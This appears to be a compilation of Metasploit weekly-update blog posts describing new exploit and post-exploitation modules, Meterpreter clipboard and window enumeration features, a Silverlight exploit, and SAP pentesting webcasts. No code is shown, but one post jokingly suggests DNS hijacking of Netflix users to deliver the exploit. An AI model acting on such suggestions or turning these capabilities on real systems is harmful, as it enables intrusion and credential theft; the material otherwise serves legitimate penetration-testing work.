The most obvious use of such a module, of course, is for laughs, as you surprise your victims with sudden Rick Astley or Nyan Cat videos.  However, there is bona fide usefulness here, too. The real reason sinn3r popped this module out is that it makes for a great "payload" for a surprise training session. Imagine that you've kicked off a social engineering campaign against your own userbase, and you've gathered your sessions through straight user error (no exploits, no sneakiness, no nothing).  Now, instead of just handing off a report to your HR department head, you can also, on the spot, conduct some training on the compromised folks by immediately showing them what they did wrong.


It's super easy to record instructional videos and slap them up on YouTube; if you use YouTube's privacy settings to mark your video as 'unlisted', they won't get indexed, which makes them about as private as a limited-audience Gists or PasteBins. Not bad, and certainly easier than packing up a whole video payload or setting up your own streaming service.


To me, this seems like a pretty powerful mechanism to train naughty users into how to do the right thing. People get inurred to nastygrams from their IT and HR department really quickly, but a sudden 30 second video ad that tells them that what they just did was unsafe behavior can have a more immediate impact, especially if it's entertaining.


Finally, full-video post-exploit payloads are a hallmark of Hollywood hacking, as described in the original feature request, so this kind of thing can be really useful for regular training sessions or demos; who cares about passing hashes and dumping session credentials; show me funny cat videos and I'm sure to renew your engagement contract!


New Modules

Including those mentioned above, we've got eight new modules this week; six exploits, and two post modules. Four of the six exploits are client-side, which reminds me: Like every year now, we fully expect to see an avalanche of new out-of-the box laptops, desktops, phones, and tablets to hit the Internet Christmas morning. If you've been building out machines for your loved ones, do take a second to confirm that you've got your latest client-side patches all squared away before wrapping them up.


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

SAP applications contain a ton of juicy information, making them a great target for malicious attackers who are after intellectual property, financial statements, credit card data, PII and PHI. Breaching SAP systems opens the door for fraud, sabotage, and industrial espionage.


SAP systems have often organically grown and are hard to update, making them a soft target. What's worse, pentesters are often unfamiliar with SAP infrastructures and how to pentest SAP systems. To help with the latter, Rapid7 is hosting some webcasts to introduce penetration testers to some of the key SAP infrastructure components.


This week, we're hosting two free webcasts for you to consider:


SAP Pentesting: From Zero 2 Hero with Metasploit


SAP Nmonkee.png

Dave Hartley aka @nmonkee has recently contributed a number of SAP modules to the Metasploit Framework. In this technical webinar for penetration testers, he is going to present a brief overview of how these modules can be used to go from Zero to Hero to achieve SAPpwnstar status when assessing or encountering SAP systems during engagements. The webcast will provide a very high level overview of common SAP system vulnerabilities and misconfigurations as well as demonstrating how the Metasploit Framework can be leveraged to quickly and easily exploit and compromise misconfigured/vulnerable SAP systems.


Dave is a Principal Security Consultant for MWR InfoSecurity and has been working in the IT Industry since 1998. Dave is a published author and has presented his research at several international respected security conferences such as 44CON, BSides, Sec-T, ZACON, DeepSec, T2 etc.


There are two showings for this webcast:


Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments


sap-tod-juan.pngIn this technical webinar for penetration testers, Metasploit developers and security researchers Tod Beardsley and Juan Vazquez from the Metasploit team, give an introduction to SAP for penetration testers. The webcast introduces viewers to the most important components of SAP and gives an overview of Metasploit modules for SAP provided by community contributors. The webinar includes a live demo and time for Q&A.


Tod Beardsley is the Engineering Manager at Rapid7 for the Metasploit Project, the world-renowned open source penetration testing platform. He has over twenty years of hands-on security knowledge, reaching back to the halcyon days of 2400 baud textfile BBSes and in-band telephony switching. Since then, he has held IT Ops and IT Security positions in large footprint organizations such as 3Com, Dell, and Westinghouse. Today, he is passionate (some might say militant) about open source software development, open source security research, and data liberation. He can often be found on Freenode IRC and Twitter as "todb."


Our second speaker and international hacker of mystery, Juan Vazquez, has been working as a security consultant on both offensive and defensive tasks since 2006. Juan works on the Metasploit project, dividing his time between writing exploits and helping the Metasploit community with their contributions. Juan started contributing to Metasploit 3 years ago as an open source contributor and joined the Rapid7 team in 2011.


There are two showings for this webcast:


Research Report: SAP Penetration Testing Using Metasploit – How to Protect Sensitive ERP Data


Prefer reading to watching a webcast? Check out this in-depth research paper, which explores a number of methods to exploit vulnerabilities within the SAP enterprise resource planning (ERP) system. These methods have been implemented and published in the form of more than 50 modules for Metasploit, a free, open source software for penetration testing.The modules enable companies to test whether their own systems could be penetrated by an attacker.


Download SAP Research Report here

Meterpreter Extended API

This week, we've got some new hotness for Meterpreter in the form of OJ TheColonial Reeves' new Extended API (extapi) functionality. So far, the extended API is for Windows targets only (hint: patches accepted), and here's the rundown of what's now available for your post-exploitation delight:


  • Clipboard Management: This allows for reading and writing from the target's clipboard. This includes not only text, like you'd expect, but a seamless download of files and images as well. Useful for grabbing interesting but temporary data such as passwords or files copies from remote sources.
  • Service Management:  Meterpreter users are familiar with the overview provided by regular 'ps', but the service management interface allows for more detailed readouts of running services; most notably, DACLs, load order group, the start up status, and if that service can interact with the desktop.
  • Window Management: Gives the ability to easily enumerate all open Windows. This can help penetration testers discover if a particular target is worth VNC'ing in on at the moment.


In addition to all this, the Extended API structure makes it a handy place to start prototyping new Meterpreter functionality for Meterpreter hackers who aren't named OJ. It's pretty well organized from the get-go and doesn't require refactoring to core Meterpreter functionality to get something put together and demo-able quickly. So, if you've got an idea of what you'd like to see Meterpreter make easier that's relevant to your particular pen-testing workflow, this is a great place to start.


New HttpServer / HttpClient HOWTO

Not too long ago, we announced Wei @_sinn3r Chen's Browser Exploit Server, a nice Ruby mixin that consolidates a lot of the grunt work behind developing exploits. This week, Wei has fleshed out more of the exploit dev documentation with a nice, compact HOWTO-style guide on writing modules that leverage the strengths of the revised HttpServer and HttpClient mixins, so read up on it here.


I've been bugging sinn3r to put together some YouTube videos on the process of exploit dev as well, complete with the requisite thumpa-thumpa music, but you are welcome to beat him to it by following his documentation for your next browser exploit. The kids love the YouTube, and watching exploit devs type is apparently an effective teaching technique for some.


SAP for People Closer to GMT

If you missed last week's SAP hacking webcast by Juan Vazquez, Christian Kirsch, and yours truly, we'll be hosting it again live next week. You can register here, and it'll be held mid-afternoon for those of you who are observing a European time zone. We hear SAP is big over there, so we'll be getting online early in the AM here in Austin to make sure you all can participate in our overview of the state of the art of SAP reconniscance and exploitation with Metasploit.


New Modules

It's an even split this week between exploit and non-exploit modules, with eight total. Rails has another DoS that we exercise this week, thanks to sinn3r's Rails Action View auxiliary module which exploits CVE-2013-6414; now would be a fine time to check your Rails version and update accordingly to get the fix.


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.


We've been all SAP all the time here in the Independent Nations of Metasploit, and expect to be for the rest of the week. You might recall that Metasploit exploit dev, Juan Vazquez published his SAP survey paper a little while back; on Tuesday, we did a moderated twitter chat on the hashtag #pwnSAP with the major SAP-focused Metasploit contributors Bruno Morrison, Chris John Riley, and Dave Hartley; and today (Thursday, December 5), Juan and I will be hosting a webcast on the various and sundry SAP exposures that Metasploit covers, and There Will Be Demos and Q&A, so it should be fun.


The whole thing has been pretty eye-opening for me; there's been a bunch of movement in the research over the last 18-24 months or so, and I'm delighted that so many talented people are making noise about this in the form of Metasploit modules. Hopefully all this will raise some awareness of the risks and exposures involved with running huge, complex, interconnected systems like ERP in general.


Silverlight Exploit

In other (non-SAP) news, this week, we're shipping our first ever Silverlight exploit, which exploits MS12-022 (aka, CVE-2013-0074). That's exciting. Use your DNS MITM attacks to jack the Netflix domains, wait for Orange is the New Black fans to connect, and profit!


It's important to know that the vulnerability is in Silverlight proper, and not IE, so while our exploit targets Microsoft Internet Explorer only today, the vulnerability is actually cross-platform. So, now that we've done this groundwork of demoing how to write a Silverlight exploit in Metasploit, all we need now is some enterprising young researcher to port this to a working Apple implementation. Have at it!


New Modules

I know, I know, last week we kind of cheated you out of your usual complement of new modules, thanks to the the Ruby float bug. To make it up to you, we have 14 new modules this week, including the Silverlight module mentioned above. Have at it! There's a lot of neat new attacks in there, so thanks again to our beloved community contributors for their efforts on these.


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

If you’re conducting security assessments on enterprise networks, chances are that you’ve run into SAP systems. In this blog post, I’d like to give you an introduction to SAP and ABAP to help you with your security audit.


The full SAP solution (ERP or SAP Business Suite) consists of several components. However, to manage the different areas of a large enterprise, probably one of the better known components or features of the SAP solution is the development system based on ABAP, the language used to build business applications on the SAP platform.


The traditional way to execute ABAP code is to use a transaction, for example, from any existing SAP client (which will be reviewed later):




One way to simplify the concept of the SAP platform is to think of it as an application server. Most readers are probably familiar with Java-related application servers, so it’s easy to think of SAP as an ABAP application server. In fact, SAP is capable of running ABAP applications as well as applications written in Java. The name of SAP’s application server is SAP NetWeaver...


If you’d like to know more about this platform and how to pentest it with Metasploit, get your free research paper now "SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data."


If you'd like to join a live discussion on the topic, we're also hosting a tweet chat tomorrow, December 3, at noon ET under the hashtag #pwnSAP. Or you can register for our webcast on Thursday, December 6 at 2:00pm ET, "Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments."

Filter Blog

By date: By tag: